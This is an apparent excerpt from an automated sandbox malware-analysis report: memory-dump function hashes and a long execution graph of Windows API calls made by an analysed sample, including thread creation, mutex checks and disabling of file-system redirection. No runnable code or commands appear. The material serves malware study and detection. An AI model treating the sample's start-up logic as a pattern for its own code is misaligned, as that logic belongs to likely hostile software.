                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: df58396e904b949e24bf5ab3c386bea46b7ef62a7966f71ce4cf90a8d403137b
                          • Instruction ID: 6fd3f3a596331aa8f37ae68218259f2962c6691818a45ad9f4ad04fe60c6a403
                          • Opcode Fuzzy Hash: df58396e904b949e24bf5ab3c386bea46b7ef62a7966f71ce4cf90a8d403137b
                          • Instruction Fuzzy Hash: 6521E4B59002499FDB10DF9AC884BDEFBF5FF58320F108429E958A7251D378A944CFA1
                          Function 0121E160 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0121E1C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 5d5d468a950a8dc7ed49678aa11792b2110a1a56801993190c0df4f1b88b3d3e
                          • Instruction ID: e136c7fec062869116cc0e38fceac500b31fdf5213bdb6091acf0590b4080345
                          • Opcode Fuzzy Hash: 5d5d468a950a8dc7ed49678aa11792b2110a1a56801993190c0df4f1b88b3d3e
                          • Instruction Fuzzy Hash: 0D1110B6C002498FDB10DF9AC844ADEFBF4EF89320F10842AD918B7610C379A945CFA1
                          Function 0108D01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2050770660.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_108d000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 630fdb4d729e5fe0f464b0ac88c7c1f03b972ba69d677789ce7c554fc0decb00
                          • Instruction ID: 07c588fe785d588dccdb2d089baaa6054a8973afc15624a399ef5a29bce41cb7
                          • Opcode Fuzzy Hash: 630fdb4d729e5fe0f464b0ac88c7c1f03b972ba69d677789ce7c554fc0decb00
                          • Instruction Fuzzy Hash: 4821D371508204DFDB15EFA8D984B16BFA5EB84354F20C6A9E9C94B396C33AD407CB61
                          Function 0108D017 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2050770660.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_108d000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                          • Instruction ID: baf7b6da5eb13098359fce744d2c2efd953930ca279e52789d63e28ca9dcbc7f
                          • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                          • Instruction Fuzzy Hash: B611BE75508280CFDB12DF54D5C4B15BFA2FB44314F24C6AAE8894B696C33AD40BCF62

                          Execution Graph

                          Execution Coverage:3.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:13.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:41
                          execution_graph 19587 4058c5 19588 4058df RtlCreateUserThread 19587->19588 19591 40591c 19588->19591 19592 4271cf 19632 42c230 19592->19632 19594 4271db GetStartupInfoW 19595 4271ef HeapSetInformation 19594->19595 19597 4271fa 19594->19597 19595->19597 19633 42a9be HeapCreate 19597->19633 19598 427248 19599 427253 19598->19599 19825 4271a6 19598->19825 19634 4293d7 GetModuleHandleW 19599->19634 19602 427259 19603 427264 __RTC_Initialize 19602->19603 19604 4271a6 _fast_error_exit 66 API calls 19602->19604 19659 42bf9f GetStartupInfoW 19603->19659 19604->19603 19607 42727e GetCommandLineA 19672 42bf08 GetEnvironmentStringsW 19607->19672 19615 42a792 __amsg_exit 66 API calls 19617 4272a3 19615->19617 19616 4272a9 19618 4272b4 19616->19618 19619 42a792 __amsg_exit 66 API calls 19616->19619 19698 42bbd7 19617->19698 19718 42a571 19618->19718 19619->19618 19621 4272bc 19622 4272c7 19621->19622 19623 42a792 __amsg_exit 66 API calls 19621->19623 19724 42bb78 19622->19724 19623->19622 19627 4272e9 19628 4272f7 19627->19628 19840 42a748 19627->19840 19843 42a774 19628->19843 19631 4272fc _doexit 19632->19594 19633->19598 19635 4293f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19634->19635 19636 4293eb 19634->19636 19637 42943e TlsAlloc 19635->19637 19846 429124 19636->19846 19641 42948c TlsSetValue 19637->19641 19642 42954d 19637->19642 19641->19642 19643 42949d 19641->19643 19642->19602 19856 42a51a 19643->19856 19648 4294e5 DecodePointer 19651 4294fa 19648->19651 19649 429548 19650 429124 __mtterm 70 API calls 19649->19650 19650->19642 19651->19649 19865 42d263 19651->19865 19654 429518 DecodePointer 19655 429529 19654->19655 19655->19649 19656 42952d 19655->19656 19871 429161 19656->19871 19658 429535 GetCurrentThreadId 19658->19642 19660 42d263 __calloc_crt 66 API calls 19659->19660 19668 42bfbd 19660->19668 19661 42c132 19662 42c168 GetStdHandle 19661->19662 19663 42c1cc SetHandleCount 19661->19663 19666 42c17a GetFileType 19661->19666 19671 42c1a0 InitializeCriticalSectionAndSpinCount 19661->19671 19662->19661 19665 427272 19663->19665 19664 42d263 __calloc_crt 66 API calls 19664->19668 19665->19607 19833 42a792 19665->19833 19666->19661 19667 42c0b2 19667->19661 19669 42c0e9 InitializeCriticalSectionAndSpinCount 19667->19669 19670 42c0de GetFileType 19667->19670 19668->19661 19668->19664 19668->19665 19668->19667 19669->19665 19669->19667 19670->19667 19670->19669 19671->19661 19671->19665 19673 42728e 19672->19673 19674 42bf24 WideCharToMultiByte 19672->19674 19685 42be4d 19673->19685 19676 42bf91 FreeEnvironmentStringsW 19674->19676 19677 42bf59 19674->19677 19676->19673 19678 42d21e __malloc_crt 66 API calls 19677->19678 19679 42bf5f 19678->19679 19679->19676 19680 42bf67 WideCharToMultiByte 19679->19680 19681 42bf85 FreeEnvironmentStringsW 19680->19681 19682 42bf79 19680->19682 19681->19673 19683 42574d _free 66 API calls 19682->19683 19684 42bf81 19683->19684 19684->19681 19686 42be62 19685->19686 19687 42be67 GetModuleFileNameA 19685->19687 20118 42a0ce 19686->20118 19689 42be8e 19687->19689 20112 42bcb3 19689->20112 19692 427298 19692->19615 19692->19617 19693 42beca 19694 42d21e __malloc_crt 66 API calls 19693->19694 19695 42bed0 19694->19695 19695->19692 19696 42bcb3 _parse_cmdline 76 API calls 19695->19696 19697 42beea 19696->19697 19697->19692 19699 42bbe0 19698->19699 19701 42bbe5 _strlen 19698->19701 19700 42a0ce ___initmbctable 94 API calls 19699->19700 19700->19701 19702 42d263 __calloc_crt 66 API calls 19701->19702 19705 42bbf3 19701->19705 19707 42bc1a _strlen 19702->19707 19703 42bc69 19704 42574d _free 66 API calls 19703->19704 19704->19705 19705->19616 19706 42d263 __calloc_crt 66 API calls 19706->19707 19707->19703 19707->19705 19707->19706 19708 42bc8f 19707->19708 19711 42bca6 19707->19711 20559 4299a8 19707->20559 19710 42574d _free 66 API calls 19708->19710 19710->19705 19712 42830a __invoke_watson 10 API calls 19711->19712 19714 42bcb2 19712->19714 19713 42eef7 __wincmdln 76 API calls 19713->19714 19714->19713 19716 42bd3f 19714->19716 19715 42be3d 19715->19616 19716->19715 19717 42eef7 76 API calls __wincmdln 19716->19717 19717->19716 19719 42a57f __IsNonwritableInCurrentImage 19718->19719 20568 42d1fb 19719->20568 19721 42a59d __initterm_e 19723 42a5be __IsNonwritableInCurrentImage 19721->19723 20571 429862 19721->20571 19723->19621 19725 42bb86 19724->19725 19728 42bb8b 19724->19728 19726 42a0ce ___initmbctable 94 API calls 19725->19726 19726->19728 19727 4272cd 19730 401000 19727->19730 19728->19727 19729 42eef7 __wincmdln 76 API calls 19728->19729 19729->19728 20636 419140 LoadLibraryW 19730->20636 19733 401039 ExitProcess 19734 401041 _memset 20720 406840 LoadLibraryW 19734->20720 19740 4010e6 20728 4084a0 19740->20728 19743 40110a OpenEventW 19749 40112a 19743->19749 19744 401184 20795 40cbf0 GetCommandLineW 19744->20795 19747 401195 ExitProcess 19748 40119d 19750 4011c8 ExitProcess 19748->19750 19751 4011dd CreateMutexW 19748->19751 20743 41cb80 OpenMutexW LoadLibraryW LocalAlloc 19749->20743 19755 4011f0 19751->19755 19753 401261 19756 4012c6 CreateMutexW 19753->19756 19778 401233 19753->19778 19755->19753 19763 401213 19755->19763 19757 4012e4 19756->19757 19758 4012ec GetLastError 19756->19758 19757->19758 19759 401301 CreateMutexW 19758->19759 19760 4012f9 19758->19760 19762 40131f 19759->19762 19760->19759 19761 41d170 2 API calls 19768 401278 19761->19768 20828 41d590 ConvertStringSecurityDescriptorToSecurityDescriptorW 19762->20828 20919 41d170 GetModuleHandleA GetProcAddress 19763->20919 19768->19756 20935 414030 19768->20935 19769 41d2c0 3 API calls 19771 401222 19769->19771 19772 401245 19771->19772 19773 401227 19771->19773 19777 401c70 119 API calls 19772->19777 20921 401c70 19773->20921 19774 401298 19774->19756 20955 414490 19774->20955 19775 41d590 2 API calls 19781 401365 19775->19781 19777->19778 19778->19753 19778->19761 19780 4012b6 19780->19756 19799 4013b8 19781->19799 20961 40c970 19781->20961 19793 4015c8 20867 40ca60 19793->20867 19794 4015af 20968 40c620 19794->20968 19798 4015f8 19800 401622 19798->19800 19806 40164d 19798->19806 20832 40c580 GetModuleHandleW 19799->20832 20992 41de00 LocalAlloc 19800->20992 19805 401645 ExitProcess 19807 4016d1 19806->19807 19808 4016c9 ExitProcess 19806->19808 20873 42466a 19807->20873 19811 42466a __snwprintf 102 API calls 19812 40174d 19811->19812 19813 42466a __snwprintf 102 API calls 19812->19813 19823 401791 _memset 19813->19823 19814 401a08 19818 41d2c0 3 API calls 19814->19818 19815 40191d 19815->19823 20999 40d7f0 19815->20999 19819 401c29 19818->19819 19820 401c3b ExitProcess 19819->19820 19821 401c2e Wow64DisableWow64FsRedirection 19819->19821 19820->19627 19821->19820 19822 401a50 OpenMutexW 19822->19814 19824 4019ac 19822->19824 19823->19814 19823->19815 19823->19824 20890 410d50 19823->20890 19824->19814 19824->19822 19826 4271b4 19825->19826 19827 4271b9 19825->19827 19829 42a985 __FF_MSGBANNER 66 API calls 19826->19829 19828 42a7d6 __NMSG_WRITE 66 API calls 19827->19828 19830 4271c1 19828->19830 19829->19827 19831 42a4f0 _fast_error_exit 3 API calls 19830->19831 19832 4271cb 19831->19832 19832->19599 19834 42a985 __FF_MSGBANNER 66 API calls 19833->19834 19835 42a79c 19834->19835 19836 42a7d6 __NMSG_WRITE 66 API calls 19835->19836 19837 42a7a4 19836->19837 22242 42a75e 19837->22242 19841 42a608 _doexit 66 API calls 19840->19841 19842 42a759 19841->19842 19842->19628 19844 42a608 _doexit 66 API calls 19843->19844 19845 42a77f 19844->19845 19845->19631 19847 42913d 19846->19847 19848 42912e DecodePointer 19846->19848 19849 42914e TlsFree 19847->19849 19850 42915c 19847->19850 19848->19847 19849->19850 19851 42d6e1 DeleteCriticalSection 19850->19851 19852 42d6f9 19850->19852 19884 42574d 19851->19884 19854 42d70b DeleteCriticalSection 19852->19854 19855 4293f0 19852->19855 19854->19852 19855->19602 19910 4290de EncodePointer 19856->19910 19858 42a522 __init_pointers __initp_misc_winsig 19911 4295d6 EncodePointer 19858->19911 19860 4294a2 EncodePointer EncodePointer EncodePointer EncodePointer 19861 42d67b 19860->19861 19862 42d686 19861->19862 19863 42d690 InitializeCriticalSectionAndSpinCount 19862->19863 19864 4294e1 19862->19864 19863->19862 19863->19864 19864->19648 19864->19649 19867 42d26c 19865->19867 19868 429510 19867->19868 19869 42d28a Sleep 19867->19869 19912 42f4b2 19867->19912 19868->19649 19868->19654 19870 42d29f 19869->19870 19870->19867 19870->19868 19923 42c230 19871->19923 19873 42916d GetModuleHandleW 19924 42d7f5 19873->19924 19875 4291ab InterlockedIncrement 19931 429203 19875->19931 19878 42d7f5 __lock 64 API calls 19879 4291cc 19878->19879 19934 42a0ec InterlockedIncrement 19879->19934 19881 4291ea 19946 42920c 19881->19946 19883 4291f7 _doexit 19883->19658 19885 425781 _free 19884->19885 19886 425758 HeapFree 19884->19886 19885->19850 19886->19885 19887 42576d 19886->19887 19890 4283ae 19887->19890 19893 429215 GetLastError 19890->19893 19892 425773 GetLastError 19892->19885 19907 4290f0 TlsGetValue 19893->19907 19896 429282 SetLastError 19896->19892 19897 42d263 __calloc_crt 62 API calls 19898 429240 19897->19898 19898->19896 19899 429248 DecodePointer 19898->19899 19900 42925d 19899->19900 19901 429261 19900->19901 19902 429279 19900->19902 19903 429161 __getptd_noexit 62 API calls 19901->19903 19904 42574d _free 62 API calls 19902->19904 19905 429269 GetCurrentThreadId 19903->19905 19906 42927f 19904->19906 19905->19896 19906->19896 19908 429120 19907->19908 19909 429105 DecodePointer TlsSetValue 19907->19909 19908->19896 19908->19897 19909->19908 19910->19858 19911->19860 19913 42f4be 19912->19913 19919 42f4d9 19912->19919 19914 42f4ca 19913->19914 19913->19919 19915 4283ae ___strgtold12_l 65 API calls 19914->19915 19917 42f4cf 19915->19917 19916 42f4ec HeapAlloc 19918 42f513 19916->19918 19916->19919 19917->19867 19918->19867 19919->19916 19919->19918 19921 429888 DecodePointer 19919->19921 19922 42989d 19921->19922 19922->19919 19923->19873 19925 42d80a 19924->19925 19926 42d81d EnterCriticalSection 19924->19926 19949 42d733 19925->19949 19926->19875 19928 42d810 19928->19926 19929 42a792 __amsg_exit 65 API calls 19928->19929 19930 42d81c 19929->19930 19930->19926 20110 42d71c LeaveCriticalSection 19931->20110 19933 4291c5 19933->19878 19935 42a10a InterlockedIncrement 19934->19935 19936 42a10d 19934->19936 19935->19936 19937 42a117 InterlockedIncrement 19936->19937 19938 42a11a 19936->19938 19937->19938 19939 42a127 19938->19939 19940 42a124 InterlockedIncrement 19938->19940 19941 42a131 InterlockedIncrement 19939->19941 19942 42a134 19939->19942 19940->19939 19941->19942 19943 42a14d InterlockedIncrement 19942->19943 19944 42a15d InterlockedIncrement 19942->19944 19945 42a168 InterlockedIncrement 19942->19945 19943->19942 19944->19942 19945->19881 20111 42d71c LeaveCriticalSection 19946->20111 19948 429213 19948->19883 19950 42d73f _doexit 19949->19950 19951 42d765 19950->19951 19974 42a985 19950->19974 19957 42d775 _doexit 19951->19957 20010 42d21e 19951->20010 19957->19928 19959 42d796 19961 42d7f5 __lock 65 API calls 19959->19961 19960 42d787 19963 4283ae ___strgtold12_l 65 API calls 19960->19963 19964 42d79d 19961->19964 19963->19957 19965 42d7d0 19964->19965 19966 42d7a5 InitializeCriticalSectionAndSpinCount 19964->19966 19969 42574d _free 65 API calls 19965->19969 19967 42d7b5 19966->19967 19968 42d7c1 19966->19968 19970 42574d _free 65 API calls 19967->19970 20015 42d7ec 19968->20015 19969->19968 19971 42d7bb 19970->19971 19973 4283ae ___strgtold12_l 65 API calls 19971->19973 19973->19968 20018 42eb1d 19974->20018 19976 42a98c 19977 42a999 19976->19977 19978 42eb1d __FF_MSGBANNER 66 API calls 19976->19978 19979 42a7d6 __NMSG_WRITE 66 API calls 19977->19979 19981 42a9bb 19977->19981 19978->19977 19980 42a9b1 19979->19980 19982 42a7d6 __NMSG_WRITE 66 API calls 19980->19982 19983 42a7d6 19981->19983 19982->19981 19984 42a7f7 __NMSG_WRITE 19983->19984 19986 42eb1d __FF_MSGBANNER 63 API calls 19984->19986 20006 42a913 19984->20006 19988 42a811 19986->19988 19987 42a983 20007 42a4f0 19987->20007 19989 42a922 GetStdHandle 19988->19989 19990 42eb1d __FF_MSGBANNER 63 API calls 19988->19990 19993 42a930 _strlen 19989->19993 19989->20006 19991 42a822 19990->19991 19991->19989 19992 42a834 19991->19992 19992->20006 20043 42eaba 19992->20043 19996 42a966 WriteFile 19993->19996 19993->20006 19996->20006 19997 42a860 GetModuleFileNameW 19998 42a881 19997->19998 20001 42a88d _wcslen 19997->20001 19999 42eaba __NMSG_WRITE 63 API calls 19998->19999 19999->20001 20000 42830a __invoke_watson 10 API calls 20000->20001 20001->20000 20002 42e978 63 API calls __NMSG_WRITE 20001->20002 20004 42a903 20001->20004 20052 42e9ed 20001->20052 20002->20001 20061 42e80c 20004->20061 20079 4290cf 20006->20079 20089 42a4c5 GetModuleHandleW 20007->20089 20014 42d227 20010->20014 20012 42d25d 20012->19959 20012->19960 20013 42d23e Sleep 20013->20014 20014->20012 20014->20013 20092 4256b9 20014->20092 20109 42d71c LeaveCriticalSection 20015->20109 20017 42d7f3 20017->19957 20019 42eb29 20018->20019 20020 4283ae ___strgtold12_l 66 API calls 20019->20020 20021 42eb33 20019->20021 20022 42eb4c 20020->20022 20021->19976 20025 42835c 20022->20025 20028 42832f DecodePointer 20025->20028 20029 428344 20028->20029 20034 42830a 20029->20034 20031 42835b 20032 42832f ___strgtold12_l 10 API calls 20031->20032 20033 428368 20032->20033 20033->19976 20037 4281e1 20034->20037 20038 428200 _memset __call_reportfault 20037->20038 20039 42821e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20038->20039 20040 4282ec __call_reportfault 20039->20040 20041 4290cf __atodbl_l 5 API calls 20040->20041 20042 428308 GetCurrentProcess TerminateProcess 20041->20042 20042->20031 20044 42eac8 20043->20044 20045 42eacf 20043->20045 20044->20045 20047 42eaf0 20044->20047 20046 4283ae ___strgtold12_l 66 API calls 20045->20046 20051 42ead4 20046->20051 20049 42a855 20047->20049 20050 4283ae ___strgtold12_l 66 API calls 20047->20050 20048 42835c ___strgtold12_l 11 API calls 20048->20049 20049->19997 20049->20001 20050->20051 20051->20048 20057 42e9ff 20052->20057 20053 42ea03 20054 42ea08 20053->20054 20055 4283ae ___strgtold12_l 66 API calls 20053->20055 20054->20001 20056 42ea1f 20055->20056 20058 42835c ___strgtold12_l 11 API calls 20056->20058 20057->20053 20057->20054 20059 42ea46 20057->20059 20058->20054 20059->20054 20060 4283ae ___strgtold12_l 66 API calls 20059->20060 20060->20056 20087 4290de EncodePointer 20061->20087 20063 42e832 20064 42e842 LoadLibraryW 20063->20064 20067 42e8bf 20063->20067 20065 42e957 20064->20065 20066 42e857 GetProcAddress 20064->20066 20072 4290cf __atodbl_l 5 API calls 20065->20072 20066->20065 20070 42e86d 7 API calls 20066->20070 20071 42e8d9 DecodePointer DecodePointer 20067->20071 20076 42e8ec 20067->20076 20068 42e922 DecodePointer 20069 42e94b DecodePointer 20068->20069 20073 42e929 20068->20073 20069->20065 20070->20067 20074 42e8af GetProcAddress EncodePointer 20070->20074 20071->20076 20075 42e976 20072->20075 20073->20069 20077 42e93c DecodePointer 20073->20077 20074->20067 20075->20006 20076->20068 20076->20069 20078 42e90f 20076->20078 20077->20069 20077->20078 20078->20069 20080 4290d7 20079->20080 20081 4290d9 IsDebuggerPresent 20079->20081 20080->19987 20088 42d525 20081->20088 20084 42d642 SetUnhandledExceptionFilter UnhandledExceptionFilter 20085 42d667 GetCurrentProcess TerminateProcess 20084->20085 20086 42d65f __call_reportfault 20084->20086 20085->19987 20086->20085 20087->20063 20088->20084 20090 42a4d9 GetProcAddress 20089->20090 20091 42a4e9 ExitProcess 20089->20091 20090->20091 20093 425736 20092->20093 20105 4256c7 20092->20105 20094 429888 _malloc DecodePointer 20093->20094 20095 42573c 20094->20095 20096 4283ae ___strgtold12_l 65 API calls 20095->20096 20108 42572e 20096->20108 20097 42a985 __FF_MSGBANNER 65 API calls 20104 4256d2 20097->20104 20098 4256f5 RtlAllocateHeap 20098->20105 20098->20108 20099 42a7d6 __NMSG_WRITE 65 API calls 20099->20104 20100 425722 20102 4283ae ___strgtold12_l 65 API calls 20100->20102 20101 429888 _malloc DecodePointer 20101->20105 20106 425720 20102->20106 20103 42a4f0 _fast_error_exit 3 API calls 20103->20104 20104->20097 20104->20099 20104->20103 20104->20105 20105->20098 20105->20100 20105->20101 20105->20104 20105->20106 20107 4283ae ___strgtold12_l 65 API calls 20106->20107 20107->20108 20108->20014 20109->20017 20110->19933 20111->19948 20114 42bcd2 20112->20114 20116 42bd3f 20114->20116 20122 42eef7 20114->20122 20115 42be3d 20115->19692 20115->19693 20116->20115 20117 42eef7 76 API calls __wincmdln 20116->20117 20117->20116 20119 42a0d7 20118->20119 20120 42a0de 20118->20120 20446 429f34 20119->20446 20120->19687 20125 42eea4 20122->20125 20128 4254a4 20125->20128 20129 4254b7 20128->20129 20135 425504 20128->20135 20136 42928e 20129->20136 20132 4254e4 20132->20135 20156 429c2a 20132->20156 20135->20114 20137 429215 __getptd_noexit 66 API calls 20136->20137 20138 429296 20137->20138 20139 4254bc 20138->20139 20140 42a792 __amsg_exit 66 API calls 20138->20140 20139->20132 20141 42a3ac 20139->20141 20140->20139 20142 42a3b8 _doexit 20141->20142 20143 42928e __getptd 66 API calls 20142->20143 20144 42a3bd 20143->20144 20145 42a3eb 20144->20145 20147 42a3cf 20144->20147 20146 42d7f5 __lock 66 API calls 20145->20146 20148 42a3f2 20146->20148 20149 42928e __getptd 66 API calls 20147->20149 20172 42a35f 20148->20172 20151 42a3d4 20149->20151 20154 42a3e2 _doexit 20151->20154 20155 42a792 __amsg_exit 66 API calls 20151->20155 20154->20132 20155->20154 20157 429c36 _doexit 20156->20157 20158 42928e __getptd 66 API calls 20157->20158 20159 429c3b 20158->20159 20160 42d7f5 __lock 66 API calls 20159->20160 20161 429c4d 20159->20161 20162 429c6b 20160->20162 20163 429c5b _doexit 20161->20163 20165 42a792 __amsg_exit 66 API calls 20161->20165 20164 429cb4 20162->20164 20167 429c82 InterlockedDecrement 20162->20167 20168 429c9c InterlockedIncrement 20162->20168 20163->20135 20442 429cc5 20164->20442 20165->20163 20167->20168 20169 429c8d 20167->20169 20168->20164 20169->20168 20170 42574d _free 66 API calls 20169->20170 20171 429c9b 20170->20171 20171->20168 20173 42a36c 20172->20173 20174 42a3a1 20172->20174 20173->20174 20175 42a0ec ___addlocaleref 8 API calls 20173->20175 20180 42a419 20174->20180 20176 42a382 20175->20176 20176->20174 20183 42a17b 20176->20183 20441 42d71c LeaveCriticalSection 20180->20441 20182 42a420 20182->20151 20184 42a20f 20183->20184 20185 42a18c InterlockedDecrement 20183->20185 20184->20174 20197 42a214 20184->20197 20186 42a1a1 InterlockedDecrement 20185->20186 20187 42a1a4 20185->20187 20186->20187 20188 42a1b1 20187->20188 20189 42a1ae InterlockedDecrement 20187->20189 20190 42a1bb InterlockedDecrement 20188->20190 20191 42a1be 20188->20191 20189->20188 20190->20191 20192 42a1c8 InterlockedDecrement 20191->20192 20194 42a1cb 20191->20194 20192->20194 20193 42a1e4 InterlockedDecrement 20193->20194 20194->20193 20195 42a1f4 InterlockedDecrement 20194->20195 20196 42a1ff InterlockedDecrement 20194->20196 20195->20194 20196->20184 20198 42a298 20197->20198 20199 42a22b 20197->20199 20200 42a2e5 20198->20200 20201 42574d _free 66 API calls 20198->20201 20199->20198 20208 42a25f 20199->20208 20211 42574d _free 66 API calls 20199->20211 20206 42a30e 20200->20206 20267 42de96 20200->20267 20202 42a2b9 20201->20202 20204 42574d _free 66 API calls 20202->20204 20207 42a2cc 20204->20207 20210 42a353 20206->20210 20220 42574d 66 API calls _free 20206->20220 20213 42574d _free 66 API calls 20207->20213 20214 42574d _free 66 API calls 20208->20214 20226 42a280 20208->20226 20209 42574d _free 66 API calls 20215 42a28d 20209->20215 20216 42574d _free 66 API calls 20210->20216 20217 42a254 20211->20217 20212 42574d _free 66 API calls 20212->20206 20218 42a2da 20213->20218 20219 42a275 20214->20219 20221 42574d _free 66 API calls 20215->20221 20222 42a359 20216->20222 20227 42e276 20217->20227 20224 42574d _free 66 API calls 20218->20224 20255 42e20d 20219->20255 20220->20206 20221->20198 20222->20174 20224->20200 20226->20209 20228 42e370 20227->20228 20229 42e287 20227->20229 20228->20208 20230 42e298 20229->20230 20231 42574d _free 66 API calls 20229->20231 20232 42e2aa 20230->20232 20233 42574d _free 66 API calls 20230->20233 20231->20230 20234 42e2bc 20232->20234 20236 42574d _free 66 API calls 20232->20236 20233->20232 20235 42e2ce 20234->20235 20237 42574d _free 66 API calls 20234->20237 20238 42e2e0 20235->20238 20239 42574d _free 66 API calls 20235->20239 20236->20234 20237->20235 20240 42e2f2 20238->20240 20241 42574d _free 66 API calls 20238->20241 20239->20238 20242 42e304 20240->20242 20244 42574d _free 66 API calls 20240->20244 20241->20240 20243 42e316 20242->20243 20245 42574d _free 66 API calls 20242->20245 20246 42e328 20243->20246 20247 42574d _free 66 API calls 20243->20247 20244->20242 20245->20243 20248 42e33a 20246->20248 20249 42574d _free 66 API calls 20246->20249 20247->20246 20250 42e34c 20248->20250 20252 42574d _free 66 API calls 20248->20252 20249->20248 20251 42e35e 20250->20251 20253 42574d _free 66 API calls 20250->20253 20251->20228 20254 42574d _free 66 API calls 20251->20254 20252->20250 20253->20251 20254->20228 20256 42e272 20255->20256 20257 42e21a 20255->20257 20256->20226 20258 42e22a 20257->20258 20259 42574d _free 66 API calls 20257->20259 20260 42e23c 20258->20260 20262 42574d _free 66 API calls 20258->20262 20259->20258 20261 42e24e 20260->20261 20263 42574d _free 66 API calls 20260->20263 20264 42e260 20261->20264 20265 42574d _free 66 API calls 20261->20265 20262->20260 20263->20261 20264->20256 20266 42574d _free 66 API calls 20264->20266 20265->20264 20266->20256 20268 42dea7 20267->20268 20269 42a303 20267->20269 20270 42574d _free 66 API calls 20268->20270 20269->20212 20271 42deaf 20270->20271 20272 42574d _free 66 API calls 20271->20272 20273 42deb7 20272->20273 20274 42574d _free 66 API calls 20273->20274 20275 42debf 20274->20275 20276 42574d _free 66 API calls 20275->20276 20277 42dec7 20276->20277 20278 42574d _free 66 API calls 20277->20278 20279 42decf 20278->20279 20280 42574d _free 66 API calls 20279->20280 20281 42ded7 20280->20281 20282 42574d _free 66 API calls 20281->20282 20283 42dede 20282->20283 20284 42574d _free 66 API calls 20283->20284 20285 42dee6 20284->20285 20286 42574d _free 66 API calls 20285->20286 20287 42deee 20286->20287 20288 42574d _free 66 API calls 20287->20288 20289 42def6 20288->20289 20290 42574d _free 66 API calls 20289->20290 20291 42defe 20290->20291 20292 42574d _free 66 API calls 20291->20292 20293 42df06 20292->20293 20294 42574d _free 66 API calls 20293->20294 20295 42df0e 20294->20295 20296 42574d _free 66 API calls 20295->20296 20297 42df16 20296->20297 20298 42574d _free 66 API calls 20297->20298 20299 42df1e 20298->20299 20300 42574d _free 66 API calls 20299->20300 20301 42df26 20300->20301 20302 42574d _free 66 API calls 20301->20302 20303 42df31 20302->20303 20304 42574d _free 66 API calls 20303->20304 20305 42df39 20304->20305 20306 42574d _free 66 API calls 20305->20306 20307 42df41 20306->20307 20308 42574d _free 66 API calls 20307->20308 20309 42df49 20308->20309 20310 42574d _free 66 API calls 20309->20310 20311 42df51 20310->20311 20312 42574d _free 66 API calls 20311->20312 20313 42df59 20312->20313 20314 42574d _free 66 API calls 20313->20314 20315 42df61 20314->20315 20316 42574d _free 66 API calls 20315->20316 20317 42df69 20316->20317 20318 42574d _free 66 API calls 20317->20318 20319 42df71 20318->20319 20320 42574d _free 66 API calls 20319->20320 20321 42df79 20320->20321 20322 42574d _free 66 API calls 20321->20322 20323 42df81 20322->20323 20324 42574d _free 66 API calls 20323->20324 20325 42df89 20324->20325 20326 42574d _free 66 API calls 20325->20326 20327 42df91 20326->20327 20328 42574d _free 66 API calls 20327->20328 20329 42df99 20328->20329 20330 42574d _free 66 API calls 20329->20330 20331 42dfa1 20330->20331 20332 42574d _free 66 API calls 20331->20332 20333 42dfa9 20332->20333 20334 42574d _free 66 API calls 20333->20334 20335 42dfb7 20334->20335 20441->20182 20445 42d71c LeaveCriticalSection 20442->20445 20444 429ccc 20444->20161 20445->20444 20447 429f40 _doexit 20446->20447 20448 42928e __getptd 66 API calls 20447->20448 20449 429f49 20448->20449 20450 429c2a __setmbcp 68 API calls 20449->20450 20451 429f53 20450->20451 20477 429cce 20451->20477 20454 42d21e __malloc_crt 66 API calls 20455 429f74 20454->20455 20456 42a093 _doexit 20455->20456 20484 429d4a 20455->20484 20456->20120 20459 42a0a0 20459->20456 20464 42a0b3 20459->20464 20465 42574d _free 66 API calls 20459->20465 20460 429fa4 InterlockedDecrement 20461 429fb4 20460->20461 20462 429fc5 InterlockedIncrement 20460->20462 20461->20462 20467 42574d _free 66 API calls 20461->20467 20462->20456 20463 429fdb 20462->20463 20463->20456 20469 42d7f5 __lock 66 API calls 20463->20469 20466 4283ae ___strgtold12_l 66 API calls 20464->20466 20465->20464 20466->20456 20468 429fc4 20467->20468 20468->20462 20471 429fef InterlockedDecrement 20469->20471 20472 42a06b 20471->20472 20473 42a07e InterlockedIncrement 20471->20473 20472->20473 20475 42574d _free 66 API calls 20472->20475 20494 42a095 20473->20494 20476 42a07d 20475->20476 20476->20473 20478 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 20477->20478 20479 429ce2 20478->20479 20480 429d0b 20479->20480 20481 429ced GetOEMCP 20479->20481 20482 429d10 GetACP 20480->20482 20483 429cfd 20480->20483 20481->20483 20482->20483 20483->20454 20483->20456 20485 429cce getSystemCP 78 API calls 20484->20485 20486 429d6a 20485->20486 20487 429d75 setSBCS 20486->20487 